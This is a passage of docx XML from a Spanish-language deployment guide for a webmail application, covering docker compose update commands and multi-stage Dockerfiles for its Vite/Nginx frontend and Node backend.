        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            cd /opt/webmail6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker compose -f docker-compose.yml -f docker-compose.prod.yml pull</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker compose -f docker-compose.yml -f docker-compose.prod.yml up -d --remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            docker system prune -f</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkEnd w:id="221"/>
    <w:bookmarkStart w:id="225" w:name="docker-configuration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.2 Docker Configuration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="222" w:name="multi-stage-dockerfile-frontend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.2.1 Multi-stage Dockerfile Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El frontend sigue el patrón estándar: build con Node.js, servir con Nginx Alpine. Esta aproximación reduce drásticamente el tamaño de la imagen final al eliminar herramientas de build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[212]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[219]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># packages/web/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stage 1: Build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> node:22-alpine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WORKDIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Instalar pnpm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prepare pnpm@9.15.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--activate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Copiar archivos de workspace</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.json pnpm-workspace.yaml tsconfig.base.json ./</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/package.json packages/shared/tsconfig.json ./packages/shared/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/package.json packages/web/tsconfig.json packages/web/vite.config.ts packages/web/tailwind.config.js packages/web/postcss.config.js ./packages/web/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Instalar dependencias</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--frozen-lockfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Copiar código fuente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/src ./packages/shared/src</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/src ./packages/web/src</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/index.html ./packages/web/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build de shared primero</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @webmail6/shared build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build del frontend (Vite)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ARG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> VITE_API_URL=/api</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> VITE_API_URL=${VITE_API_URL}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @webmail6/web build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stage 2: Serve con Nginx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nginx:1.27-alpine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Eliminar configuración por defecto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/nginx/conf.d/default.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configuración de Nginx para SPA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/nginx.conf /etc/nginx/conf.d/webmail.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Archivos estáticos del build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/web/dist /usr/share/nginx/html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Health check</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HEALTHCHECK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--interval=15s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--timeout=5s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--start-period=5s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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--spider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:80/health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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPOSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Non-root user</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nginx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"nginx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"-g"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"daemon off;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="222"/>
    <w:bookmarkStart w:id="223" w:name="multi-stage-dockerfile-backend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.2.2 Multi-stage Dockerfile Backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># packages/api/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stage 1: Dependencies</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> node:22-alpine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> deps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WORKDIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prepare pnpm@9.15.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--activate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.json pnpm-workspace.yaml tsconfig.base.json ./</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/package.json packages/shared/tsconfig.json ./packages/shared/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/package.json packages/api/tsconfig.json ./packages/api/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--frozen-lockfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--prod</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stage 2: Builder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> node:22-alpine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WORKDIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
